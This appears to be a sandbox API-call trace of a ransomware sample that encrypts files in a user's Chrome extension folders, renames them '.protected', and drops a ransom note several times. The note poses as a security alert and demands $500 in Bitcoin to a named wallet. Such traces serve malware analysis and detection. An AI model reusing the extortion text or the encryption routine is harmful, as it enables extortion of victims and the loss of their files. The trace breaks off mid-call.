[0079.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.646] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.646] CloseHandle (hObject=0x160) returned 1 [0079.646] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.646] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata") returned 140 [0079.646] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.646] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.646] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*") returned 142 [0079.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) 
returned 0x47bbd0 [0079.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\.") returned 142 [0079.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.647] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\..") returned 143 [0079.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.647] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.647] lstrcmpiW 
(lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.647] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.647] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.647] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.647] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.648] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.648] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.660] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.660] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.660] CloseHandle (hObject=0x164) returned 1 [0079.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected") returned 173 [0079.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.661] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.661] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.661] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\RESTORE_FILES.txt") returned 158 [0079.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.663] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.663] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.663] lstrlenA (lpString="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") returned 684 [0079.663] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.664] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.664] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.664] CloseHandle (hObject=0x160) returned 1 [0079.664] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.664] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.664] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\RESTORE_FILES.txt") returned 148 [0079.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.664] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.664] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.665] lstrlenA (lpString="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") returned 684 [0079.665] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.665] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.665] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0079.665] CloseHandle (hObject=0x15c) returned 1 [0079.666] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.666] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.666] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\RESTORE_FILES.txt") returned 141 [0079.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.667] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.667] lstrlenA (lpString="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") returned 684 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.667] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.667] CloseHandle (hObject=0x158) returned 1 [0079.668] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="$Recycle.bin") returned 1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo") returned 123 [0079.668] lstrcmpW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2=".") returned 1 [0079.668] lstrcmpW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="..") returned 1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*") returned 125 [0079.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.668] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\.") returned 125 [0079.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.668] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.668] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\..") returned 126 [0079.668] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.668] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.668] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.668] lstrcmpiW (lpString1="4.2.8_0", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="4.2.8_0", lpString2="Program Files") returned -1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="Program Files (x86)") returned -1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="$Recycle.bin") returned 1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="System Volume Information") returned -1 [0079.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0") returned 131 [0079.669] lstrcmpW (lpString1="4.2.8_0", lpString2=".") returned 1 [0079.669] lstrcmpW (lpString1="4.2.8_0", lpString2="..") returned 1 [0079.669] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*") returned 133 [0079.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.674] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\.") returned 133 [0079.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.674] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\..") returned 134 [0079.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.674] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.674] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0079.674] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.675] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 